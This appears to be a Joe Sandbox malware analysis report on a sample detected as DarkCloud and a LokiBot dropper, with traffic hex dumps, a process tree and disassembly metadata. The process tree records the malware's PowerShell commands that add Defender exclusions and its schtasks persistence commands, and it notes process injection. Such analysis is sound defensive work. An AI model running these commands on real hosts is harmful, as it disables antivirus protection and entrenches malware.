2024-12-03 13:29:15 UTC	16355	OUT	Data Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f Data Ascii:
2024-12-03 13:29:15 UTC	16355	OUT	Data Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:29:15 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:29:15 UTC	16355	OUT	Data Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:29:15 UTC	16355	OUT	Data Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d Data Ascii:
2024-12-03 13:29:15 UTC	232	OUT	Data Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:29:15 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:29:19 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:29:18 GMT Content-Type: application/json Content-Length: 552 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Target ID:	0
Start time:	08:27:11
Start date:	03/12/2024
Path:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe"
Imagebase:	0x310000
File size:	997'888 bytes
MD5 hash:	936823354CE6B1D705E73FEA6784B33E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.2103476200.0000000003767000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.2103476200.0000000003767000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:27:14
Start date:	03/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe"
Imagebase:	0x7c0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:27:14
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:27:14
Start date:	03/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LjlEiSlJe.exe"
Imagebase:	0x7c0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:27:14
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:27:14
Start date:	03/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjlEiSlJe" /XML "C:\Users\user\AppData\Local\Temp\tmpFFDD.tmp"
Imagebase:	0x3b0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:27:14
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:27:15
Start date:	03/12/2024
Path:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe"
Imagebase:	0x5c0000
File size:	997'888 bytes
MD5 hash:	936823354CE6B1D705E73FEA6784B33E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	08:27:17
Start date:	03/12/2024
Path:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
Imagebase:	0x320000
File size:	997'888 bytes
MD5 hash:	936823354CE6B1D705E73FEA6784B33E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 0000000B.00000002.2163631105.0000000003947000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000B.00000002.2163631105.0000000003947000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:27:21
Start date:	03/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjlEiSlJe" /XML "C:\Users\user\AppData\Local\Temp\tmp18B4.tmp"
Imagebase:	0x3b0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:27:21
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:27:21
Start date:	03/12/2024
Path:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\LjlEiSlJe.exe"
Imagebase:	0x5a0000
File size:	997'888 bytes
MD5 hash:	936823354CE6B1D705E73FEA6784B33E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	08:27:27
Start date:	03/12/2024
Path:	C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0xf40000
File size:	418'304 bytes
MD5 hash:	64ACA4F48771A5BA50CD50F2410632AD
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	161
Total number of Limit Nodes:	8

Executed Functions

Function 04B80EE8 Relevance: 2.6, Strings: 2, Instructions: 133COMMON

Download Yara Rule

Strings

Te]q, xrefs: 04B80F05
Te]q, xrefs: 04B81062

Memory Dump Source

Source File: 00000000.00000002.2105635716.0000000004B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b80000_yMvZXcwN2OdoP6x.jbxd

Similarity

API ID:
String ID: Te]q$Te]q
API String ID: 0-3320153681
Opcode ID: 167649ce501488d00c3328f560e7beee2085c043306b0b4cd35aab5ff4314423
Instruction ID: dc2c4b29f2c08c1a565beeebb88a3c69404690bdc55ca6a7b09b3651e26e76ba
Opcode Fuzzy Hash: 167649ce501488d00c3328f560e7beee2085c043306b0b4cd35aab5ff4314423
Instruction Fuzzy Hash: 5441B731B101198FCB08EFA9C85567EB6F6FB88740F11855EE506EB361DA34AD09CB91

Function 04B80EE7 Relevance: 2.6, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

Te]q, xrefs: 04B80F05
Te]q, xrefs: 04B81062

Memory Dump Source

Source File: 00000000.00000002.2105635716.0000000004B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b80000_yMvZXcwN2OdoP6x.jbxd

Similarity

API ID:
String ID: Te]q$Te]q
API String ID: 0-3320153681
Opcode ID: 727736afbddbcf7322fe97023e41975478ae3394f8e183f4d4dfeba42d10e45d
Instruction ID: 2d157be3fe37d7eaf1f769bc647746b402a1f4266ed83e46b27e654449644015
Opcode Fuzzy Hash: 727736afbddbcf7322fe97023e41975478ae3394f8e183f4d4dfeba42d10e45d
Instruction Fuzzy Hash: CA41A731B101198FCB08EFA9C8556BEB7F2FB88740F11859EE506EB361DA709D09CB51

Function 04B821B8 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2105635716.0000000004B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b80000_yMvZXcwN2OdoP6x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1229cbf118ae64f992975637202adffcd1fca732ee7992b9ecbece2a95029903
Instruction ID: b6383ca8b39003f1c71c8988b403287251fffb8eee1027a81576f511006f5039
Opcode Fuzzy Hash: 1229cbf118ae64f992975637202adffcd1fca732ee7992b9ecbece2a95029903
Instruction Fuzzy Hash: 6681F2B2215242CFC70CAF58C9805697BA2EB8131076788DEED029F266D330FD93CB56

Function 04B8A3C2 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2105635716.0000000004B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b80000_yMvZXcwN2OdoP6x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68fd093535a2339433381b6529eef6c662f8e202b10d1bba03f17f84c80331a3
Instruction ID: a625060d4c26fbe62c908d835c8d87558056aa3ff72aba65818fe336b68a4d62
Opcode Fuzzy Hash: 68fd093535a2339433381b6529eef6c662f8e202b10d1bba03f17f84c80331a3
Instruction Fuzzy Hash: A561D1B07002058BDB18BB78D99566EBAA7EFC8304F14C86ED00ADB795DF38E905C791

Function 04B87278 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2105635716.0000000004B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b80000_yMvZXcwN2OdoP6x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8a937440cfd63a4dc59a5771ba0328dd1b31dfcbf435809e3681a30583dfaea
Instruction ID: 65536ac53b6f344e347e3671195737dedb1e78943629d766bd566624d0e6601b
Opcode Fuzzy Hash: f8a937440cfd63a4dc59a5771ba0328dd1b31dfcbf435809e3681a30583dfaea
Instruction Fuzzy Hash: 836191B07002058BDB18BB78999566EBAA7EFC8304F14886ED10ADB795DE38E905C791

Function 04B821B7 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2105635716.0000000004B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b80000_yMvZXcwN2OdoP6x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2e4c817a0096e78674cc1b8a0b6237ca93c3af14b95addaa265b8d5cb7fa939
Instruction ID: 39f7b47d9faea8e06c8d9f6cd80372d6641ffab681e7b77d6952f93122af005c
Opcode Fuzzy Hash: c2e4c817a0096e78674cc1b8a0b6237ca93c3af14b95addaa265b8d5cb7fa939
Instruction Fuzzy Hash: 74619371305211CFD70CEF58C98092977A6BB8531076748DEEE029B2A1D730FD92DB56

Function 0772B2B4 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0772B4EE

Strings

#@m\, xrefs: 0772B2F3
#@m\, xrefs: 0772B322

Memory Dump Source

Source File: 00000000.00000002.2108431654.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7720000_yMvZXcwN2OdoP6x.jbxd

Similarity

API ID: CreateProcess
String ID: #@m\$#@m\
API String ID: 963392458-2702672237
Opcode ID: 0658314cab4ac7bb6834a6553bc46dee2e6afede880605415c59cdccf6f3f294
Instruction ID: 836dffd4e8ac8652c46188ce8f7ba648333f31111ab56def98406a75fe3a8d16
Opcode Fuzzy Hash: 0658314cab4ac7bb6834a6553bc46dee2e6afede880605415c59cdccf6f3f294
Instruction Fuzzy Hash: A3916EB1D0022ACFDB24CF69C8817EDBBB2FF48314F148569D818A7250EB749986DF91

Function 0772B2B8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0772B4EE

Strings

#@m\, xrefs: 0772B2F3
#@m\, xrefs: 0772B322

Memory Dump Source

Source File: 00000000.00000002.2108431654.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7720000_yMvZXcwN2OdoP6x.jbxd

Similarity

API ID: CreateProcess
String ID: #@m\$#@m\
API String ID: 963392458-2702672237
Opcode ID: 0a731c48bee868d20e4618c1436772ea2b699e9cb239f48060f99430693c8c7b
Instruction ID: 64eb36d6c40ee04caa72be91083398a57146aa720579ab8f7b9f3242339429dd
Opcode Fuzzy Hash: 0a731c48bee868d20e4618c1436772ea2b699e9cb239f48060f99430693c8c7b
Instruction Fuzzy Hash: 64916FB1D0022ACFDB24CF69C8817EDBBB2FF48314F148569D818A7250EB749986DF91

Function 04B8E4E8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#@m\, xrefs: 04B8E6F7

Memory Dump Source

Source File: 00000000.00000002.2105635716.0000000004B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b80000_yMvZXcwN2OdoP6x.jbxd

Similarity

API ID: HandleModule
String ID: #@m\
API String ID: 4139908857-1373067833
Opcode ID: 8abc8fec14bea42e3592972c4a6daeb78be2ce4d36fed09c709139acfa7f27c4
Instruction ID: 09d578a887c4521daee376b0b8d8f4b28bc2835108ef3d2c40a4bf57a73afa91
Opcode Fuzzy Hash: 8abc8fec14bea42e3592972c4a6daeb78be2ce4d36fed09c709139acfa7f27c4
Instruction Fuzzy Hash: 4F711F70A00B458FD724EF6AD04579ABBE5FB88304F00896ED48AD7A50EB74F945CB91

Function 04B88D2C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 04B88DE9

Strings

#@m\, xrefs: 04B88D6C

Memory Dump Source

Source File: 00000000.00000002.2105635716.0000000004B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b80000_yMvZXcwN2OdoP6x.jbxd

Similarity

API ID: Create
String ID: #@m\
API String ID: 2289755597-1373067833
Opcode ID: 84e690e52b8ca459a9f64f0218d7c480e5cbc02f911aebf483130ac6a36322dc
Instruction ID: bc000d66c169c0c9aec4330b5270f28b60cb97793f1d89b14639545b0e7f25fd
Opcode Fuzzy Hash: 84e690e52b8ca459a9f64f0218d7c480e5cbc02f911aebf483130ac6a36322dc
Instruction Fuzzy Hash: 534112B1C00619CFDB24DFA9C844BDEBBB5FF48304F20805AD408AB254DB766A4ACF91

Function 04B878BC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 04B88DE9

Strings

#@m\, xrefs: 04B88D6C

Memory Dump Source

Source File: 00000000.00000002.2105635716.0000000004B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b80000_yMvZXcwN2OdoP6x.jbxd

Similarity

API ID: Create
String ID: #@m\
API String ID: 2289755597-1373067833
Opcode ID: 53fc2ad32561201e65c87630144ddf53e3e38097b6ae78561cae10eb22724b72
Instruction ID: ea3af2e8b5a584c2cdca00373a675c13648c14b617b5ca79d34d937a44393dd8
Opcode Fuzzy Hash: 53fc2ad32561201e65c87630144ddf53e3e38097b6ae78561cae10eb22724b72
Instruction Fuzzy Hash: 3741E3B0D00619CFDB24EFA9C844B9EBBB5FF48704F60849AD408AB255DB756946CF90

Function 0772B029 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0772B0C0

Strings

#@m\, xrefs: 0772B04F

Memory Dump Source

Source File: 00000000.00000002.2108431654.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7720000_yMvZXcwN2OdoP6x.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: #@m\
API String ID: 3559483778-1373067833
Opcode ID: 51d45bf7ded439a0924822fb6b46ed249ac057b1619b6b890433b771df2e9bb6
Instruction ID: 50261ef5b9efd454017213599c5500c9f2a114979175a6527c2ddf961f072a10
Opcode Fuzzy Hash: 51d45bf7ded439a0924822fb6b46ed249ac057b1619b6b890433b771df2e9bb6
Instruction Fuzzy Hash: 62215AB1D003599FCB10DFA9C885BEEBBF5FF48310F108429E568A7250D7799945CBA0

Function 0772B030 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0772B0C0

Strings

#@m\, xrefs: 0772B04F

Memory Dump Source

